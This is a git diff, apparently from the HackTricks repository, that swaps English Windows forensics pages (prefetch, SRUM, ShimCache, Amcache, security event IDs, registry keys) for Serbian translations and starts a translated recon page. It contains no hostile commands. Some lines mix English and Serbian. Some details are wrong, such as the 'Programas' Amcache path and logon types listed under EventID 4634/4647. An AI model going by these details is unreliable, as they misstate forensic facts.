-The file `C:\Windows\Prefetch\Layout.ini` contains the **names of the folders of the files that are prefetched**. This file contains **information about the number of the executions**, **dates** of the execution and **files** **open** by the program.
-
-To inspect these files you can use the tool [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
+Datoteka `C:\Windows\Prefetch\Layout.ini` sadrži **imena foldera datoteka koje su prefethed**. Ova datoteka sadrži **informacije o broju izvršenja**, **datumima** izvršenja i **datotekama** **otvorenim** od strane programa.
 
+Da biste pregledali ove datoteke, možete koristiti alat [**PEcmd.exe**](https://github.com/EricZimmerman/PECmd):
 ```bash
 .\PECmd.exe -d C:\Users\student\Desktop\Prefetch --html "C:\Users\student\Desktop\out_folder"
 ```
-
 ![](<../../../images/image (315).png>)
 
 ### Superprefetch
 
-**Superprefetch** has the same goal as prefetch, **load programs faster** by predicting what is going to be loaded next. However, it doesn't substitute the prefetch service.\
-This service will generate database files in `C:\Windows\Prefetch\Ag*.db`.
+**Superprefetch** ima isti cilj kao prefetch, **brže učitavanje programa** predviđanjem šta će biti učitano sledeće. Međutim, ne zamenjuje prefetch servis.\
+Ova usluga će generisati datoteke baze podataka u `C:\Windows\Prefetch\Ag*.db`.
 
-In these databases you can find the **name** of the **program**, **number** of **executions**, **files** **opened**, **volume** **accessed**, **complete** **path**, **timeframes** and **timestamps**.
+U ovim bazama podataka možete pronaći **ime** **programa**, **broj** **izvršavanja**, **otvorene** **datoteke**, **pristup** **volumenu**, **potpunu** **putanju**, **vremenske okvire** i **vremenske oznake**.
 
-You can access this information using the tool [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
+Možete pristupiti ovim informacijama koristeći alat [**CrowdResponse**](https://www.crowdstrike.com/resources/community-tools/crowdresponse/).
 
 ### SRUM
 
-**System Resource Usage Monitor** (SRUM) **monitors** the **resources** **consumed** **by a process**. It appeared in W8 and it stores the data in an ESE database located in `C:\Windows\System32\sru\SRUDB.dat`.
+**Monitor korišćenja sistemskih resursa** (SRUM) **prati** **resurse** **koje koristi** **proces**. Pojavio se u W8 i čuva podatke u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`.
 
-It gives the following information:
+Daje sledeće informacije:
 
-- AppID and Path
-- User that executed the process
-- Sent Bytes
-- Received Bytes
-- Network Interface
-- Connection duration
-- Process duration
+- AppID i Putanja
+- Korisnik koji je izvršio proces
+- Poslati bajtovi
+- Primljeni bajtovi
+- Mrežni interfejs
+- Trajanje veze
+- Trajanje procesa
 
-This information is updated every 60 mins.
-
-You can obtain the date from this file using the tool [**srum_dump**](https://github.com/MarkBaggett/srum-dump).
+Ove informacije se ažuriraju svake 60 minuta.
 
+Možete dobiti podatke iz ove datoteke koristeći alat [**srum_dump**](https://github.com/MarkBaggett/srum-dump).
 ```bash
 .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum
 ```
-
 ### AppCompatCache (ShimCache)
 
-The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include:
+**AppCompatCache**, poznat i kao **ShimCache**, deo je **Baze podataka o kompatibilnosti aplikacija** koju je razvila **Microsoft** kako bi se rešili problemi sa kompatibilnošću aplikacija. Ova sistemska komponenta beleži razne delove metapodataka o datotekama, koji uključuju:
 
-- Full path of the file
-- Size of the file
-- Last Modified time under **$Standard_Information** (SI)
-- Last Updated time of the ShimCache
-- Process Execution Flag
+- Puni put do datoteke
+- Veličinu datoteke
+- Vreme poslednje izmene pod **$Standard_Information** (SI)
+- Vreme poslednje ažuriranja ShimCache-a
+- Zastavicu izvršenja procesa
 
-Such data is stored within the registry at specific locations based on the version of the operating system:
+Ovi podaci se čuvaju u registru na specifičnim lokacijama u zavisnosti od verzije operativnog sistema:
 
-- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries.
-- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively.
+- Za XP, podaci se čuvaju pod `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` sa kapacitetom za 96 unosa.
+- Za Server 2003, kao i za verzije Windows-a 2008, 2012, 2016, 7, 8 i 10, putanja za skladištenje je `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, sa kapacitetom od 512 i 1024 unosa, respektivno.
 
-To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use.
+Za parsiranje sačuvanih informacija, preporučuje se korišćenje [**AppCompatCacheParser** alata](https://github.com/EricZimmerman/AppCompatCacheParser).
 
 ![](<../../../images/image (75).png>)
 
 ### Amcache
 
-The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`.
+Datoteka **Amcache.hve** je u suštini registri hives koji beleži detalje o aplikacijama koje su izvršene na sistemu. Obično se nalazi na `C:\Windows\AppCompat\Programas\Amcache.hve`.
 
-This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system.
-
-To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format:
+Ova datoteka je značajna jer čuva zapise o nedavno izvršenim procesima, uključujući puteve do izvršnih datoteka i njihove SHA1 heš vrednosti. Ove informacije su neprocenjive za praćenje aktivnosti aplikacija na sistemu.
 
+Za ekstrakciju i analizu podataka iz **Amcache.hve**, može se koristiti [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) alat. Sledeća komanda je primer kako koristiti AmcacheParser za parsiranje sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu:
 ```bash
 AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder
 ```
+Među generisanim CSV datotekama, `Amcache_Unassociated file entries` je posebno značajan zbog bogatih informacija koje pruža o neudruženim unosima datoteka.
 
-Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries.
-
-The most interesting CVS file generated is the `Amcache_Unassociated file entries`.
+Najzanimljivija CVS datoteka koja je generisana je `Amcache_Unassociated file entries`.
 
 ### RecentFileCache
 
-This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries.
+Ovaj artefakt se može naći samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnoj izvršavanju nekih binarnih datoteka.
 
-You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file.
+Možete koristiti alat [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) za analizu datoteke.
 
-### Scheduled tasks
+### Zakazane radnje
 
-You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML.
+Možete ih izvući iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i pročitati ih kao XML.
 
-### Services
+### Servisi
 
-You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when.
+Možete ih pronaći u registru pod `SYSTEM\ControlSet001\Services`. Možete videti šta će biti izvršeno i kada.
 
 ### **Windows Store**
 
-The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\
-This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**.
+Instalirane aplikacije se mogu naći u `\ProgramData\Microsoft\Windows\AppRepository\`\
+Ova biblioteka ima **log** sa **svakom instaliranom** aplikacijom u sistemu unutar baze podataka **`StateRepository-Machine.srd`**.
 
-Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential.
+Unutar tabele aplikacija ove baze podataka, moguće je pronaći kolone: "Application ID", "PackageNumber" i "Display Name". Ove kolone sadrže informacije o unapred instaliranim i instaliranim aplikacijama i može se utvrditi da li su neke aplikacije deinstalirane jer bi ID-ovi instaliranih aplikacija trebali biti sekvencijalni.
 
-It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
-And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
+Takođe je moguće **pronaći instaliranu aplikaciju** unutar registra na putu: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\
+I **deinstalirane** **aplikacije** u: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\`
 
-## Windows Events
+## Windows događaji
 
-Information that appears inside Windows events are:
+Informacije koje se pojavljuju unutar Windows događaja su:
 
-- What happened
-- Timestamp (UTC + 0)
-- Users involved
-- Hosts involved (hostname, IP)
-- Assets accessed (files, folder, printer, services)
+- Šta se desilo
+- Vreme (UTC + 0)
+- Uključeni korisnici
+- Uključeni hostovi (hostname, IP)
+- Pristupeni resursi (datoteke, folderi, štampači, servisi)
 
-The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension.
+Logovi se nalaze u `C:\Windows\System32\config` pre Windows Vista i u `C:\Windows\System32\winevt\Logs` posle Windows Vista. Pre Windows Vista, logovi događaja su bili u binarnom formatu, a posle toga su u **XML formatu** i koriste **.evtx** ekstenziju.
 
-The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
+Lokacija datoteka događaja može se pronaći u SYSTEM registru u **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`**
 
-They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
+Mogu se vizualizovati iz Windows Event Viewer-a (**`eventvwr.msc`**) ili sa drugim alatima kao što su [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.**
 
-## Understanding Windows Security Event Logging
+## Razumevanje Windows sigurnosnog logovanja događaja
 
-Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access.
+Događaji pristupa se beleže u datoteci sigurnosne konfiguracije koja se nalazi na `C:\Windows\System32\winevt\Security.evtx`. Veličina ove datoteke je prilagodljiva, a kada se dostigne njena kapacitet, stariji događaji se prepisuju. Beleženi događaji uključuju prijave i odjave korisnika, korisničke akcije i promene u sigurnosnim postavkama, kao i pristup datotekama, folderima i zajedničkim resursima.
 
-### Key Event IDs for User Authentication:
+### Ključni ID-evi događaja za autentifikaciju korisnika:
 
-- **EventID 4624**: Indicates a user successfully authenticated.
-- **EventID 4625**: Signals an authentication failure.
-- **EventIDs 4634/4647**: Represent user logoff events.
-- **EventID 4672**: Denotes login with administrative privileges.
+- **EventID 4624**: Ukazuje na to da je korisnik uspešno autentifikovan.
+- **EventID 4625**: Signalizira neuspeh autentifikacije.
+- **EventIDs 4634/4647**: Predstavljaju događaje odjave korisnika.
+- **EventID 4672**: Označava prijavu sa administratorskim privilegijama.
 
-#### Sub-types within EventID 4634/4647:
+#### Podtipovi unutar EventID 4634/4647:
 
-- **Interactive (2)**: Direct user login.
-- **Network (3)**: Access to shared folders.
-- **Batch (4)**: Execution of batch processes.
-- **Service (5)**: Service launches.
-- **Proxy (6)**: Proxy authentication.
-- **Unlock (7)**: Screen unlocked with a password.
-- **Network Cleartext (8)**: Clear text password transmission, often from IIS.
-- **New Credentials (9)**: Usage of different credentials for access.
-- **Remote Interactive (10)**: Remote desktop or terminal services login.
-- **Cache Interactive (11)**: Login with cached credentials without domain controller contact.
-- **Cache Remote Interactive (12)**: Remote login with cached credentials.
-- **Cached Unlock (13)**: Unlocking with cached credentials.
+- **Interaktivno (2)**: Direktna prijava korisnika.
+- **Mrežno (3)**: Pristup zajedničkim folderima.
+- **Batch (4)**: Izvršavanje batch procesa.
+- **Servis (5)**: Pokretanje servisa.
+- **Proxy (6)**: Proxy autentifikacija.
+- **Otključavanje (7)**: Ekran otključan lozinkom.
+- **Mrežni čisti tekst (8)**: Prenos lozinke u čistom tekstu, često iz IIS-a.
+- **Nove kredencijale (9)**: Korišćenje različitih kredencijala za pristup.
+- **Daljinsko interaktivno (10)**: Prijava putem daljinske radne površine ili terminalskih usluga.
+- **Keširano interaktivno (11)**: Prijava sa keširanim kredencijalima bez kontakta sa kontrolerom domena.
+- **Keširano daljinsko interaktivno (12)**: Daljinska prijava sa keširanim kredencijalima.
+- **Keširano otključavanje (13)**: Otključavanje sa keširanim kredencijalima.
 
-#### Status and Sub Status Codes for EventID 4625:
+#### Status i podstatus kodovi za EventID 4625:
 
-- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack.
-- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt.
-- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins.
-- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts.
-- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access.
-- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location.
-- **0xC0000193**: Account expiration - Access attempts with expired user accounts.
-- **0xC0000071**: Expired password - Login attempts with outdated passwords.
-- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket.
-- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security.
-- **0xC0000225**: Indicates a system bug rather than a security issue.
-- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon.
+- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad na enumeraciju korisničkog imena.
+- **0xC000006A**: Tačno korisničko ime, ali pogrešna lozinka - Mogući pokušaj pogađanja lozinke ili brute-force napad.
+- **0xC0000234**: Korisnički nalog je zaključan - Može uslediti nakon brute-force napada koji rezultira višestrukim neuspelim prijavama.
+- **0xC0000072**: Nalog onemogućen - Neovlašćeni pokušaji pristupa onemogućenim nalozima.
+- **0xC000006F**: Prijava van dozvoljenog vremena - Ukazuje na pokušaje pristupa van postavljenih sati prijave, mogući znak neovlašćenog pristupa.
+- **0xC0000070**: Kršenje ograničenja radne stanice - Može biti pokušaj prijave sa neovlašćenog mesta.
+- **0xC0000193**: Istek naloga - Pokušaji pristupa sa isteklim korisničkim nalozima.
+- **0xC0000071**: Istekla lozinka - Pokušaji prijave sa zastarelim lozinkama.
+- **0xC0000133**: Problemi sa sinhronizacijom vremena - Velike vremenske razlike između klijenta i servera mogu ukazivati na sofisticiranije napade poput pass-the-ticket.
+- **0xC0000224**: Obavezna promena lozinke potrebna - Česte obavezne promene mogu sugerisati pokušaj destabilizacije sigurnosti naloga.
+- **0xC0000225**: Ukazuje na grešku sistema, a ne na sigurnosni problem.
+- **0xC000015b**: Odbijeni tip prijave - Pokušaj pristupa sa neovlašćenim tipom prijave, kao što je korisnik koji pokušava da izvrši prijavu servisa.
 
 #### EventID 4616:
 
-- **Time Change**: Modification of the system time, could obscure the timeline of events.
+- **Promena vremena**: Izmena sistemskog vremena, može zamagliti vremensku liniju događaja.
 
-#### EventID 6005 and 6006:
+#### EventID 6005 i 6006:
 
-- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down.
+- **Pokretanje i gašenje sistema**: EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje.
 
 #### EventID 1102:
 
-- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities.
+- **Brisanje logova**: Brisanje sigurnosnih logova, što je često crvena zastava za prikrivanje nezakonitih aktivnosti.
 
-#### EventIDs for USB Device Tracking:
+#### EventIDs za praćenje USB uređaja:
 
-- **20001 / 20003 / 10000**: USB device first connection.
-- **10100**: USB driver update.
-- **EventID 112**: Time of USB device insertion.
+- **20001 / 20003 / 10000**: Prva konekcija USB uređaja.
+- **10100**: Ažuriranje USB drajvera.
+- **EventID 112**: Vreme umetanja USB uređaja.
 
-For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
+Za praktične primere simulacije ovih tipova prijava i mogućnosti iskopavanja kredencijala, pogledajte [detaljni vodič Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them).
 
-Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625.
+Detalji događaja, uključujući status i podstatus kodove, pružaju dodatne uvide u uzroke događaja, posebno u Event ID 4625.
 
-### Recovering Windows Events
+### Oporavak Windows događaja
 
-To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events.
+Da biste povećali šanse za oporavak obrisanih Windows događaja, preporučuje se da isključite sumnjivi računar direktnim isključivanjem. **Bulk_extractor**, alat za oporavak koji specificira ekstenziju `.evtx`, se preporučuje za pokušaj oporavka takvih događaja.
 
-### Identifying Common Attacks via Windows Events
+### Identifikacija uobičajenih napada putem Windows događaja
 
-For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/).
+Za sveobuhvatan vodič o korišćenju Windows Event ID-ova u identifikaciji uobičajenih sajber napada, posetite [Red Team Recipe](https://redteamrecipe.com/event-codes/).
 
-#### Brute Force Attacks
+#### Brute Force napadi
 
-Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds.
+Identifikovani višestrukim zapisima EventID 4625, praćenim EventID 4624 ako napad uspe.
 
-#### Time Change
+#### Promena vremena
 
-Recorded by EventID 4616, changes to system time can complicate forensic analysis.
+Zabeležena sa EventID 4616, promene u sistemskom vremenu mogu otežati forenzičku analizu.
 
-#### USB Device Tracking
+#### Praćenje USB uređaja
 
-Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps.
+Korisni sistemski EventID-ovi za praćenje USB uređaja uključuju 20001/20003/10000 za početnu upotrebu, 10100 za ažuriranja drajvera i EventID 112 iz DeviceSetupManager-a za vremenske oznake umetanja.
 
-#### System Power Events
+#### Događaji napajanja sistema
 
-EventID 6005 indicates system startup, while EventID 6006 marks shutdown.
+EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje.
 
-#### Log Deletion
+#### Brisanje logova
 
-Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis.
+Sigurnosni EventID 1102 signalizira brisanje logova, kritičan događaj za forenzičku analizu.
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
index 840b910bc..0376c8434 100644
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md
@@ -6,95 +6,95 @@
 
 ### **Windows Version and Owner Info**
 
-- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner.
+- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you will find verziju Windows-a, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način.
 
 ### **Computer Name**
 
-- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**.
+- Ime računara se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**.
 
 ### **Time Zone Setting**
 
-- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**.
+- Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**.
 
 ### **Access Time Tracking**
 
-- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use:
-  `fsutil behavior set disablelastaccess 0`
+- Po defaultu, praćenje poslednjeg vremena pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite:
+`fsutil behavior set disablelastaccess 0`
 
 ### Windows Versions and Service Packs
 
-- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features.
+- **Verzija Windows-a** označava izdanje (npr. Home, Pro) i njegovu verziju (npr. Windows 10, Windows 11), dok su **Service Packs** ažuriranja koja uključuju ispravke i, ponekad, nove funkcije.
 
 ### Enabling Last Access Time
 
-- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring.
+- Omogućavanje praćenja poslednjeg vremena pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema.
 
 ### Network Information Details
 
-- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions.
+- Registry sadrži opsežne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablovske, 3G)** i **kategorije mreža (Javna, Privatna/Domaća, Domen/Rad)**, što je od suštinskog značaja za razumevanje mrežnih bezbednosnih postavki i dozvola.
 
 ### Client Side Caching (CSC)
 
-- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity.
+- **CSC** poboljšava pristup offline datotekama keširanjem kopija deljenih datoteka. Različita podešavanja **CSCFlags** kontrolišu kako i koje datoteke se keširaju, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom povezanošću.
 
 ### AutoStart Programs
 
-- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software.
+- Programi navedeni u raznim `Run` i `RunOnce` registry ključevima se automatski pokreću prilikom pokretanja, utičući na vreme podizanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera.
 
 ### Shellbags
 
-- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means.
+- **Shellbags** ne samo da čuvaju podešavanja za prikaz foldera, već takođe pružaju forenzičke dokaze o pristupu folderima čak i ako folder više ne postoji. Oni su neprocenjivi za istrage, otkrivajući korisničke aktivnosti koje nisu očigledne na druge načine.
 
 ### USB Information and Forensics
 
-- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents.
+- Detalji pohranjeni u registry o USB uređajima mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa osetljivim prenosima datoteka ili incidentima neovlašćenog pristupa.
 
 ### Volume Serial Number
 
-- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices.
+- **Serijski broj volumena** može biti ključan za praćenje specifične instance datotečnog sistema, koristan u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke preko različitih uređaja.
 
 ### **Shutdown Details**
 
-- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**.
+- Vreme gašenja i broj gašenja (potonji samo za XP) se čuvaju u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**.
 
 ### **Network Configuration**
 
-- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
-- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
+- Za detaljne informacije o mrežnim interfejsima, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**.
+- Prva i poslednja vremena mrežne veze, uključujući VPN veze, su zabeležena pod raznim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**.
 
 ### **Shared Folders**
 
-- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability.
+- Deljeni folderi i podešavanja su pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Podešavanja Client Side Caching (CSC) određuju dostupnost offline datoteka.
 
 ### **Programs that Start Automatically**
 
-- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup.
+- Putanje poput **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe postavljene da se pokreću prilikom pokretanja.
 
 ### **Searches and Typed Paths**
 
-- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively.
+- Istraživanja u Explorer-u i unesene putanje se prate u registry pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, respektivno.
 
 ### **Recent Documents and Office Files**
 
-- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths.
+- Nedavne datoteke i Office datoteke koje su pristupane su zabeležene u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama verzije Office-a.
 
 ### **Most Recently Used (MRU) Items**
 
-- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`.
+- MRU liste, koje ukazuju na nedavne putanje datoteka i komande, se čuvaju u raznim `ComDlg32` i `Explorer` podključevima pod `NTUSER.DAT`.
 
 ### **User Activity Tracking**
 
-- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
+- Funkcija User Assist beleži detaljne statistike korišćenja aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**.
 
 ### **Shellbags Analysis**
 
-- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis.
+- Shellbags, koji otkrivaju detalje o pristupu folderima, se čuvaju u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu.
 
 ### **USB Device History**
 
-- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps.
-- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**.
-- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively.
+- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** i **`HKLM\SYSTEM\ControlSet001\Enum\USB`** sadrže bogate detalje o povezanim USB uređajima, uključujući proizvođača, naziv proizvoda i vremenske oznake povezivanja.
+- Korisnik povezan sa specifičnim USB uređajem može se precizno odrediti pretraživanjem `NTUSER.DAT` hives za **{GUID}** uređaja.
+- Poslednji montirani uređaj i njegov serijski broj volumena mogu se pratiti kroz `System\MountedDevices` i `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respektivno.
 
 This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability.
 
diff --git a/src/generic-methodologies-and-resources/external-recon-methodology/README.md b/src/generic-methodologies-and-resources/external-recon-methodology/README.md
index ef4a9559e..d73f6fddd 100644
--- a/src/generic-methodologies-and-resources/external-recon-methodology/README.md
+++ b/src/generic-methodologies-and-resources/external-recon-methodology/README.md
@@ -1,49 +1,41 @@
-# External Recon Methodology
+# Metodologija spoljnog rekonaissansa
 
 {{#include ../../banners/hacktricks-training.md}}
 
-

 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+## Otkrića imovine
 
-{% embed url="https://www.stmcyber.com/careers" %}
+> Tako su vam rekli da je sve što pripada nekoj kompaniji unutar opsega, i želite da saznate šta ta kompanija zapravo poseduje.
 
-## Assets discoveries
+Cilj ove faze je da se dobiju sve **kompanije koje poseduje glavna kompanija** i zatim sve **imovine** tih kompanija. Da bismo to postigli, uradićemo sledeće:
 
-> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
